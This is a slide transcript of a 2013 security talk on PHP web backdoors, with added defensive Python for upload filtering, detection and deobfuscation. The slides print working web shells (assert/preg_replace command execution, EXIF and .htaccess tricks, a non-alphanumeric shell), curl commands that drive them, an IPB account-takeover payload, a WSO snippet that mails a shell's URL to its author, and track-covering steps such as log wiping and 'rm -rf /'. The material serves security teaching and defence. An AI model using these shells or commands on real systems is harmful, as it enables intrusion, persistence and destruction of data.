Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
3. Overview
★ Anatomy of (PHP) Web Hacking
★ Maintaining Access
★ Techniques
★ Covering Tracks
★ Case Studies
★ Detect / Clean up
4. How do we plant a web backdoor?
High Risk
Medium Risk
Low Risk
OWASP Top Ten 2013
A1-Injection
A2-Broken Authentication and Session Management
A3-Cross-Site Scripting (XSS)
A4-Insecure Direct Object References
A5-Security Misconfiguration
A6-Sensitive Data Exposure
A7-Missing Function Level Access Control
A8-Cross-Site Request Forgery (CSRF)
A9-Using Components with Known Vulnerabilities
A10-Unvalidated Redirects and Forwards
5. Public CMS/Plugins PWN
1. Vulnerability Assessment and Mapping
★ Vulnerable version? Does the vulnerability actually exist?
★ Do the conditions match? Known limitations?
2. Exploitation
★ Public exploit available?
2.1 Yes - just use it
★ Review and test it first
2.2 No - Source code analysis
★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/
★ Issue tracker (SVN/GIT repo.)
★ Public / private vulnerability discussion
3. Zero-Day - for l33t h4x0r!
★ Source code analysis with no patch to guide you; valuable!
6. Joomla! - Unauthorised Uploads
Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4
Fixed Date: 2013-July-31 (2.5.14, 3.1.5)
Vulnerable files
1. libraries/joomla/filesystem/file.php
2. administrator/components/com_media/helpers/media.php
Scenario
1. Joomla! <= 2.5.13
2. User with author privilege
3. OS = Windows machine, or misconfigured Apache + Linux
Bypassing File Upload Restrictions in Joomla!
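An added example, not Joomla's code and not part of the talk: a Python upload filename filter that accounts for the two conditions the slide lists. The slide names the conditions without spelling out the mechanism; the facts behind them are that Windows drops trailing dots and spaces when it creates a file (so a name whose literal last "extension" looks harmless can land on disk as shell.php), and that Apache's mod_mime applies a handler to any extension in a multi-extension name when AddHandler is misconfigured (so shell.php.jpg may run as PHP). The allowed-extension list is an assumed site policy.

```python
import re

# Added example (not Joomla's code). Normalize the submitted name the way the
# target filesystem and web server will BEFORE testing it; a test on the literal
# last extension alone is what the two OS conditions on the slide defeat.

EXECUTABLE_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phps", "phar", "pht"}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}   # assumed site policy


def naive_is_allowed(filename):
    """The weak pattern: compare the literal last extension against a blocklist."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in EXECUTABLE_EXTENSIONS


def as_stored_on_windows(name):
    """Win32/NTFS strip trailing dots and spaces when creating a file."""
    return name.rstrip(". ")


def normalize_upload_name(filename):
    """Reduce the submitted name to what will actually exist on disk."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    name = as_stored_on_windows(name)
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name)             # NUL, %, spaces, unicode -> "_"
    return name


def hardened_is_allowed(filename):
    """Allowlist the final extension and refuse an executable extension anywhere."""
    name = normalize_upload_name(filename)
    if not name or name.startswith("."):                      # .htaccess and friends
        return False
    parts = name.lower().split(".")
    if len(parts) < 2 or any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False                                           # shell.php.jpg, cat.jpg.php
    return parts[-1] in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for candidate in ("shell.php.", "shell.php.jpg", "cat.jpg.php", "holiday.JPG ", "../../.htaccess"):
        print(repr(candidate), "naive:", naive_is_allowed(candidate), "hardened:", hardened_is_allowed(candidate))
```

The naive check lets "shell.php." through because its last "extension" is empty; on Windows the file is created as shell.php. The hardened check strips what the filesystem would strip, rejects executable extensions in any position, and only then consults the allowlist.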
11. Case Study - Official Ubuntu Forums
http://www.ubuntuforums.org/
★ Hacked on 14 July 2013, Defaced on 20 July 2013
★ 1.82 million users’ data leaked
★ Attacker had full access to the forums' application servers
★ Servers were running the latest version of vBulletin
What happened (as posted on the Canonical blog)
● A moderator account was compromised
● The attacker posted an XSS payload on the forum and sent it to an admin
● 31 seconds later the admin account was pwned
12. IPB - Bad Sanitization
Invision Power Board <= 3.4.4
Released on : 2013/05/13 by @johnjean
Logical vulnerability + bad sanitization
1. Create a new user with the e-mail address
admin@email.com + [150 spaces] + A
2. MySQL limitation! A string longer than the 150-character column is
truncated on insert, and trailing spaces are insignificant in comparison,
so the new user ends up with the same e-mail as the admin and can
change the admin's password!
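An added simulation, not IPB's code and not part of the talk, of the flaw the slide describes. Two MySQL behaviours combine: with a non-strict sql_mode an over-long value is silently truncated to the VARCHAR width (150 here, taken from the slide), and under a PAD SPACE collation the comparison "admin@email.com   " = "admin@email.com" is true because trailing spaces are insignificant. The table layout and a password-change flow keyed on the email column are assumptions made for the demonstration; the hardened variant shows the three fixes that close it.

```python
import re

# Added simulation (not IPB's code). Column width from the slide; the table
# layout and the email-keyed UPDATE are assumptions for the demonstration.

EMAIL_COLUMN_WIDTH = 150
ADMIN_EMAIL = "admin@email.com"


def mysql_store(value, width=EMAIL_COLUMN_WIDTH, strict=False):
    """VARCHAR insert: truncate silently (default sql_mode) or reject (STRICT_TRANS_TABLES)."""
    if len(value) > width:
        if strict:
            raise ValueError("Data too long for column 'email'")
        return value[:width]
    return value


def mysql_equal(a, b):
    """'=' under a PAD SPACE collation: trailing spaces do not count."""
    return a.rstrip(" ") == b.rstrip(" ")


class VulnerableMembers:
    """Minimal members table with the two code paths that matter."""

    def __init__(self):
        self.rows = [{"id": 1, "email": ADMIN_EMAIL, "password": "admin-secret"}]

    def register(self, email, password):
        # Uniqueness is checked on the submitted value, which still ends in "A"...
        if any(mysql_equal(r["email"], email) for r in self.rows):
            return None
        # ...but the INSERT keeps only the first 150 characters: "admin@email.com" + spaces.
        row = {"id": len(self.rows) + 1, "email": mysql_store(email), "password": password}
        self.rows.append(row)
        return row

    def change_password(self, actor, new_password):
        # Assumed flow: UPDATE members SET password=? WHERE email=?
        changed = 0
        for r in self.rows:
            if mysql_equal(r["email"], actor["email"]):
                r["password"] = new_password
                changed += 1
        return changed


class HardenedMembers(VulnerableMembers):
    def register(self, email, password):
        email = email.strip()                                  # normalize before comparing
        if len(email) > EMAIL_COLUMN_WIDTH or not re.fullmatch(r"[^@\s]+@[^@\s]+", email):
            raise ValueError("invalid or over-long email")     # validate against the column width
        if any(r["email"].strip().lower() == email.lower() for r in self.rows):
            return None
        row = {"id": len(self.rows) + 1, "email": mysql_store(email, strict=True), "password": password}
        self.rows.append(row)
        return row

    def change_password(self, actor, new_password):
        # Key the UPDATE on the primary key, never on a user-supplied column.
        for r in self.rows:
            if r["id"] == actor["id"]:
                r["password"] = new_password
                return 1
        return 0


def attack(members):
    """Register with the slide's payload, then change 'my' password; did admin's change too?"""
    payload = ADMIN_EMAIL + " " * 150 + "A"
    try:
        me = members.register(payload, "attacker-pw")
    except ValueError:
        return False
    if me is None:
        return False
    members.change_password(me, "pwned")
    return members.rows[0]["password"] == "pwned"


if __name__ == "__main__":
    print("vulnerable takeover:", attack(VulnerableMembers()))
    print("hardened takeover:  ", attack(HardenedMembers()))
```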
13. Other factors
3rd party components
★ uploadify, ckeditor, ckfinder, tinymce, openx
Shared Hosting Security
★ Exposed Session Data
★ Improper user privileges
(OS/Code execution, critical file manipulation)
★ Vulnerable services (SSH, FTP etc.)
MITM, insider attack, lack of physical access control etc.
14. Maintaining Access
Add arbitrary accounts (*nix shadow, AD etc.)
Reverse Shell and/or Bind Shell using ...
★ Binary/Script Backdoor
1. Bind Port to *nix shell
2. Send *nix shell back to attacker
3. Make a relay tunnel
4. Hidden trigger to spawn shell
★ Web backdoor: runs as the (less privileged) web server user
Connect via HTTP Methods & Headers (GET/POST etc.)
19. Code Evaluation besides eval()
1. assert()
assert('sys' . 'tem('.$_POST["cmd"].')');
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
2. preg_replace() with the /e modifier (deprecated in PHP 5.5.0, removed in PHP 7.0)
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' );
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
3. And many more, e.g. the OS command execution functions; see this list:
http://stackoverflow.com/questions/3115559/exploitable-php-functions
20. Stupid trick, but it works!
★ A GNU license header at the beginning of a PHP file!
/* Copyright (C) 1991 Free Software Foundation, Inc.
This file is part of the GNU C Library.
…
*/ <?php ...
★ PGP Public Key !?
/* -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
...
*/ <?php …
★ A software license that prohibits decoding
★ More creative filenames!
○ lndex.php
○ 1ndex.php
○ index2.php
○ wp-manual.php
○ cat.jpg.php
○ license.txt
○ README.md
○ .bash_profile
21. PHP: exif_read_data()
1. Create exif meta-data using exiftool
$ exiftool 2600.jpg -Software=system
$ exiftool 2600.jpg -Model=id
2. Put 2600.jpg next to the backdoor:
$A = exif_read_data('2600.jpg');
$A['Software']($A['Model']);
3. Browse to the backdoor and boom!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
22. .htaccess + any file format
1. Apache configuration
AllowOverride All (SetHandler in .htaccess needs at least the FileInfo override)
2. .htaccess
<FilesMatch "2600.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
3. 2600.jpg
<?php @system($_POST["cmd"]); ?>
26. non-alphabet PHP shell
<?$_="";$_[+""]='';$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
*** This code contains non-printable characters; it may not work if you copy and paste it! ***
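An added triage scanner, not part of the talk, covering the tricks from slides 19 through 26 in one pass: assert() and preg_replace /e as eval substitutes, exif_read_data() feeding a variable function call, a PHP handler set in .htaccess, license or PGP text ahead of the open tag, look-alike and double-extension filenames, and shells made of almost no alphanumerics. The sample tree is constructed from the slides' own snippets; the thresholds (80 bytes of leading text, 35 percent alphanumerics) are the editor's choices, and every label is a lead for a human, not a verdict.

```python
import os
import re

# Added example, not from the talk. Heuristic scanner for the PHP backdoor
# tricks on slides 19-26. Thresholds are editor's choices; review every hit.

PHP_OPEN_TAG = re.compile(r"<\?(?!xml)", re.I)
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phps"}

CODE_PATTERNS = [
    ("assert-as-eval", re.compile(r"\bassert\s*\(", re.I)),
    # preg_replace('<d>...<d>e', ...): same quote and delimiter on both sides, "e" among modifiers
    ("preg_replace-/e", re.compile(r"""preg_replace\s*\(\s*(['"])(\W).*?\2[a-z]*e[a-z]*\1""", re.S)),
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("os-command", re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)),
    ("exif-payload", re.compile(r"\bexif_read_data\s*\(", re.I)),
    # $A['Software']($A['Model']) or ${'_'.$_}['_'](...): a call through an array element
    ("variable-function-call", re.compile(r"(\$\w+|\$\{[^}]*\})(\[[^\]]*\])+\s*\(")),
    ("request-input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")),
]
HTACCESS_PHP_HANDLER = re.compile(r"^\s*(Set|Add)Handler\s+application/x-httpd-php", re.I | re.M)
LOOKALIKE = str.maketrans("l1", "ii")        # lndex.php, 1ndex.php -> index.php


def name_findings(path):
    """Names chosen to blend in (slide 20)."""
    name = os.path.basename(path)
    stem, ext = os.path.splitext(name)
    out = []
    if ext.lower() != ".php":
        return out
    low = stem.lower()
    if (low.translate(LOOKALIKE) == "index" and low != "index") or re.fullmatch(r"index\d+", low):
        out.append("lookalike-name")
    if re.search(r"\.[a-z0-9]{2,4}\.php$", name, re.I):
        out.append("double-extension")           # cat.jpg.php
    return out


def content_findings(path, body):
    """Code-level tricks from slides 19-26 inside one file."""
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    out = []
    if name == ".htaccess":
        if HTACCESS_PHP_HANDLER.search(body):
            out.append("htaccess-php-handler")   # slide 22: SetHandler for 2600.jpg
        return out
    tag = PHP_OPEN_TAG.search(body)
    if tag is None:
        return out
    if ext not in PHP_EXTENSIONS:
        out.append("php-in-non-php-file")        # 2600.jpg, license.txt, README.md ...
    if len(body[:tag.start()].strip()) >= 80:
        out.append("text-before-php-tag")        # license / PGP block ahead of <?php
    code = body[tag.start():]
    out.extend(label for label, pattern in CODE_PATTERNS if pattern.search(code))
    dense = re.sub(r"\s+", "", code)
    if len(dense) >= 40 and sum(c.isalnum() for c in dense) / len(dense) < 0.35:
        out.append("non-alphanumeric-heavy")     # slide 26 style shell
    return out


def scan_tree(files):
    """files: {relative path: content}. Returns only the paths with findings."""
    report = {}
    for path, body in files.items():
        hits = name_findings(path) + content_findings(path, body)
        if hits:
            report[path] = hits
    return report


# Constructed sample tree reusing the slides' own snippets (not real site files).
SAMPLE_TREE = {
    "wp-content/evil.php": '''<?php assert('sys' . 'tem('.$_POST["cmd"].')'); ?>''',
    "wp-content/evil2.php": '''<?php preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), ''); ?>''',
    "images/2600.php": "<?php $A = exif_read_data('2600.jpg'); $A['Software']($A['Model']); ?>",
    "images/.htaccess": '<FilesMatch "2600.jpg">\nSetHandler application/x-httpd-php\n</FilesMatch>\n',
    "images/2600.jpg": '<?php @system($_POST["cmd"]); ?>',
    "license.txt": "/* Copyright (C) 1991 Free Software Foundation, Inc.\n"
                   + "This file is part of the GNU C Library.\n" * 3 + "*/ <?php eval($_POST['x']); ?>",
    "lndex.php": "<?php echo 'hello'; ?>",
    "cat.jpg.php": "<?php echo 'hello'; ?>",
    "shell.php": r'''<?$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>'''
                 r'''<?=${'_'.$_}['_'](${'_'.$_}['__']);?>''',
    "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_TREE).items():
        print(f"{path}: {', '.join(hits)}")
```

Run it over a real document root by building the dictionary from os.walk(); the clean index.php in the sample produces no finding, which is the false-positive check worth keeping when the thresholds are tuned.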
27. Common "survivor" features!
works on various OSes (Windows/Linux/OS X) and ISO ??
find writable directory
read/write file
merge into every files
merge into backup db / files / zip
reverse/bind php shell
database client
File management (symlink?)
av/ids/ips/waf detect
credential dumper
os command
network scanner
TCP/UDP/HTTP/DNS Amp flood
SOCKS Proxy for pivoting
HTTP proxy, IRC connect back
etc.
29. Free kiddie backdoors!
c99
r57
wso
icfdkshell
weevely
ASPsh
msfpayload
Use at your own risk!
Caution!
There are many cases where a backdoor is served inside another backdoor,
e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip
$x10="\x6dai\154";
$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];
$x0c="\141r\162a\171\040".$x0b;
$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");
$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];
$x0f=@$x10($x0e,$x0c,$x0b);
Decoded:
mail("fwrite@live.ca", "array ".$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"], $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"]);
i.e. the shell e-mails its own URL (e.g. target/backdoor.php) to the shell's author.
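An added decoder, not part of the talk, for the escape obfuscation in the WSO 2.5.1 snippet above: PHP resolves "\xHH" (hexadecimal) and "\NNN" (octal) inside double-quoted strings, so the hidden names come back with a single regex pass. The snippet is reproduced with its backslashes intact; SERVER_NAME and SCRIPT_NAME are filled with placeholder values chosen for the example.

```python
import re

# Added example, not from the talk. Resolve PHP double-quoted string escapes
# and rebuild the call the WSO snippet makes. Placeholder host/path values.

WSO_SNIPPET = (
    r'$x10="\x6dai\154";'
    r'$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];'
    r'$x0c="\141r\162a\171\040".$x0b;'
    r'$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");'
    r'$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];'
    r'$x0f=@$x10($x0e,$x0c,$x0b);'
)

PHP_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")   # \xHH (max 2 digits) | \NNN
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')                        # a double-quoted literal


def php_unescape(text):
    """Resolve \\xHH and \\NNN (octal) escapes the way PHP does inside double quotes."""
    def one(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)          # PHP wraps octal values above \377
    return PHP_ESCAPE.sub(one, text)


def reveal_strings(php_source):
    """Rewrite every double-quoted literal in a PHP snippet with its escapes resolved."""
    return DQ_STRING.sub(lambda m: '"' + php_unescape(m.group(1)) + '"', php_source)


def decode_wso_mailer(server_name="target", script_name="/backdoor.php"):
    """Follow the snippet's string assembly by hand; return the mail() call it builds."""
    server = {"SERVER_NAME": server_name, "SCRIPT_NAME": script_name}
    x10 = php_unescape(r"\x6dai\154")                                   # function name
    x0b = (server[php_unescape(r"\x53\x45RVE\122_\x4eAM\x45")]
           + server[php_unescape(r"\123\103\x52I\x50\x54_\116\101\115E")])
    x0c = php_unescape(r"\141r\162a\171\040") + x0b                    # subject
    x0d = [php_unescape(p) for p in
           (r"\143\x61", r"\x6c\x69", r"\146\x77\162\151\x74\x65", r"\100", r"v\x65\x2e")]
    x0e = x0d[2] + x0d[3] + x0d[1] + x0d[4] + x0d[0]                   # recipient
    return {"function": x10, "to": x0e, "subject": x0c, "body": x0b}


if __name__ == "__main__":
    print(reveal_strings(WSO_SNIPPET))
    print(decode_wso_mailer())
```

reveal_strings() is the generic tool: run it over any PHP file that looks like the snippet and the function names and array keys appear in clear before any behaviour is reasoned about; decode_wso_mailer() then walks the revealed assignments to the mail() arguments.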
30. Covering Tracks
★ root?
★ logs e.g. /var/log/*
★ history e.g. ~/.bash_history
★ self-destruction
★ rm -rf /